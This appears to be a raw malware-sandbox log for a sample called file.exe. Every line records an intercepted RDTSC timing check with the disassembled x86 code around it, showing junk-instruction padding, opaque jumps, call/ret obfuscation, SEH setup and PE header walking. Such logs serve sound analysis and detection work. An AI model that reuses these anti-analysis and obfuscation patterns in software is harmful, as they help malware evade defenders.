Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3B6A0 second address: D3B6C7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jne 00007FF830ED6D38h 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 popad 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e jns 00007FF830ED6D36h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D39EF8 second address: D39EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3B928 second address: D3B92D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3B92D second address: D3B946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007FF830E5CFC8h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jno 00007FF830E5CFCCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3FD17 second address: D3FD20 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D413DB second address: D413E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D01DC2 second address: D01DF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF830ED6D40h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FF830ED6D44h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D440C8 second address: D440DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 js 00007FF830E5CFC6h 0x0000000c jne 00007FF830E5CFC6h 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D440DB second address: D440EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF830ED6D3Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D443F7 second address: D44420 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FF830E5CFC6h 0x00000009 jno 00007FF830E5CFC6h 0x0000000f popad 0x00000010 jbe 00007FF830E5CFCEh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 jg 00007FF830E5CFCCh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D448AA second address: D448B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FF830ED6D36h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47DFC second address: D47E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D47FA2 second address: D47FA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48438 second address: D4843E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4843E second address: D48448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF830ED6D36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48448 second address: D4844C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D486FF second address: D48705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48705 second address: D4870A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48DBF second address: D48DC9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF830ED6D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D48FF1 second address: D49003 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 js 00007FF830E5CFE5h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49265 second address: D49290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF830ED6D36h 0x0000000a popad 0x0000000b push eax 0x0000000c jg 00007FF830ED6D3Eh 0x00000012 nop 0x00000013 stc 0x00000014 push eax 0x00000015 je 00007FF830ED6D42h 0x0000001b ja 00007FF830ED6D3Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49767 second address: D4978F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF830E5CFC8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jnp 00007FF830E5CFC6h 0x00000015 jmp 00007FF830E5CFCFh 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4A284 second address: D4A28D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4A155 second address: D4A159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4A159 second address: D4A163 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF830ED6D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4A163 second address: D4A196 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF830E5CFD4h 0x00000008 jmp 00007FF830E5CFCEh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jg 00007FF830E5CFD0h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4B310 second address: D4B315 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4B315 second address: D4B376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF830E5CFD2h 0x0000000e pop edx 0x0000000f nop 0x00000010 add esi, 29B21318h 0x00000016 sub dword ptr [ebp+122D1AAFh], ebx 0x0000001c push 00000000h 0x0000001e add dword ptr [ebp+122D21DEh], esi 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007FF830E5CFC8h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 00000019h 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 clc 0x00000041 clc 0x00000042 push eax 0x00000043 pushad 0x00000044 push ebx 0x00000045 pushad 0x00000046 popad 0x00000047 pop ebx 0x00000048 pushad 0x00000049 pushad 0x0000004a popad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BD4A second address: D4BD66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF830ED6D48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4DED4 second address: D4DF14 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF830E5CFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c movzx edi, di 0x0000000f push 00000000h 0x00000011 call 00007FF830E5CFD9h 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 pushad 0x0000001a mov ebx, dword ptr [ebp+122D2D3Bh] 0x00000020 popad 0x00000021 xchg eax, ebx 0x00000022 push ebx 0x00000023 pushad 0x00000024 ja 00007FF830E5CFC6h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4EA35 second address: D4EA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007FF830ED6D38h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 push ecx 0x00000022 pop edi 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007FF830ED6D38h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000016h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f push 00000000h 0x00000041 xchg eax, ebx 0x00000042 push ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4EA86 second address: D4EA8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D544AF second address: D544B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D544B4 second address: D544BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D544BA second address: D544BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D544BE second address: D544CF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55A78 second address: D55A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D579A9 second address: D579AE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5ABC0 second address: D5ABC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5ABC6 second address: D5ABE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF830E5CFD9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CAD2 second address: D5CB2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 sbb edi, 53120697h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FF830ED6D38h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a ja 00007FF830ED6D3Ch 0x00000030 adc di, BD8Eh 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+122D38C1h], ebx 0x0000003d push eax 0x0000003e jnl 00007FF830ED6D48h 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CB2B second address: D5CB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D60C20 second address: D60C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF830ED6D36h 0x0000000a jc 00007FF830ED6D48h 0x00000010 jmp 00007FF830ED6D40h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 push esi 0x00000019 pushad 0x0000001a je 00007FF830ED6D36h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D00346 second address: D0034A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0034A second address: D00350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D00350 second address: D00370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 je 00007FF830E5CFC6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop edi 0x00000012 pushad 0x00000013 jmp 00007FF830E5CFCBh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D621C7 second address: D621D1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF830ED6D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D621D1 second address: D621D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D621D6 second address: D6222F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 pop ebx 0x00000012 nop 0x00000013 sbb di, 1200h 0x00000018 call 00007FF830ED6D49h 0x0000001d jne 00007FF830ED6D38h 0x00000023 pop ebx 0x00000024 push 00000000h 0x00000026 jmp 00007FF830ED6D3Eh 0x0000002b push 00000000h 0x0000002d mov bx, cx 0x00000030 xchg eax, esi 0x00000031 jo 00007FF830ED6D50h 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D641B2 second address: D641DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF830E5CFD6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF830E5CFCCh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D641DA second address: D641DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D641DE second address: D641E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D647AC second address: D647B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D647B3 second address: D647C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D647C1 second address: D647C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D647C5 second address: D647CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6575F second address: D65764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54C05 second address: D54C0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54C0A second address: D54CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF830ED6D41h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jmp 00007FF830ED6D48h 0x00000014 push dword ptr fs:[00000000h] 0x0000001b sub dword ptr [ebp+122D2E12h], ebx 0x00000021 push edx 0x00000022 cld 0x00000023 pop edi 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FF830ED6D38h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 mov eax, dword ptr [ebp+122D0E01h] 0x0000004b push 00000000h 0x0000004d push ebx 0x0000004e call 00007FF830ED6D38h 0x00000053 pop ebx 0x00000054 mov dword ptr [esp+04h], ebx 0x00000058 add dword ptr [esp+04h], 0000001Dh 0x00000060 inc ebx 0x00000061 push ebx 0x00000062 ret 0x00000063 pop ebx 0x00000064 ret 0x00000065 jnl 00007FF830ED6D3Ch 0x0000006b push FFFFFFFFh 0x0000006d mov bx, dx 0x00000070 push eax 0x00000071 jbe 00007FF830ED6D3Eh 0x00000077 push ecx 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6FBB8 second address: D6FBBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55C57 second address: D55C5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D57C5D second address: D57C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D58B8D second address: D58BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF830ED6D3Ch 0x0000000a popad 0x0000000b nop 0x0000000c sub ebx, dword ptr [ebp+122D29C7h] 0x00000012 push dword ptr fs:[00000000h] 0x00000019 and edi, dword ptr [ebp+122D1C0Dh] 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 mov edi, ebx 0x00000028 mov eax, dword ptr [ebp+122D09DDh] 0x0000002e mov bh, 35h 0x00000030 push FFFFFFFFh 0x00000032 mov edi, ebx 0x00000034 nop 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushad 0x00000039 popad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6134F second address: D61353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D64A32 second address: D64A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55C5B second address: D55C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D57C61 second address: D57C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D58BCF second address: D58BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D61353 second address: D61359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D64A38 second address: D64A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55C61 second address: D55C8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF830ED6D47h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jbe 00007FF830ED6D36h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D57C67 second address: D57C6C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D58BD4 second address: D58BD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D58BD9 second address: D58BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D58BE7 second address: D58BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6F5B6 second address: D6F5EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF830E5CFD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF830E5CFD7h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6F5EC second address: D6F5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6F784 second address: D6F789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6F789 second address: D6F793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF830ED6D36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D74799 second address: B939BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FF830E5CFC6h 0x00000009 jne 00007FF830E5CFC6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xor dword ptr [esp], 71EEE222h 0x00000019 jg 00007FF830E5CFD8h 0x0000001f jmp 00007FF830E5CFD2h 0x00000024 push dword ptr [ebp+122D1145h] 0x0000002a pushad 0x0000002b sbb ecx, 48303125h 0x00000031 mov cl, 00h 0x00000033 popad 0x00000034 call dword ptr [ebp+122D1C46h] 0x0000003a pushad 0x0000003b add dword ptr [ebp+122D25B0h], eax 0x00000041 xor eax, eax 0x00000043 mov dword ptr [ebp+122D287Ah], ecx 0x00000049 mov edx, dword ptr [esp+28h] 0x0000004d jno 00007FF830E5CFCCh 0x00000053 mov dword ptr [ebp+122D2BCFh], eax 0x00000059 jc 00007FF830E5CFCCh 0x0000005f sub dword ptr [ebp+122D287Ah], ecx 0x00000065 mov esi, 0000003Ch 0x0000006a clc 0x0000006b add esi, dword ptr [esp+24h] 0x0000006f mov dword ptr [ebp+122D287Ah], ecx 0x00000075 lodsw 0x00000077 sub dword ptr [ebp+122D287Ah], ecx 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 sub dword ptr [ebp+122D2638h], ecx 0x00000087 mov dword ptr [ebp+122D287Ah], eax 0x0000008d mov ebx, dword ptr [esp+24h] 0x00000091 jp 00007FF830E5CFD4h 0x00000097 pushad 0x00000098 add dword ptr [ebp+122D25B0h], esi 0x0000009e mov dword ptr [ebp+122D287Ah], ecx 0x000000a4 popad 0x000000a5 nop 0x000000a6 jmp 00007FF830E5CFD8h 0x000000ab push eax 0x000000ac pushad 0x000000ad pushad 0x000000ae push edx 0x000000af pop edx 0x000000b0 push eax 0x000000b1 push edx 0x000000b2 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7C5A1 second address: D7C5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
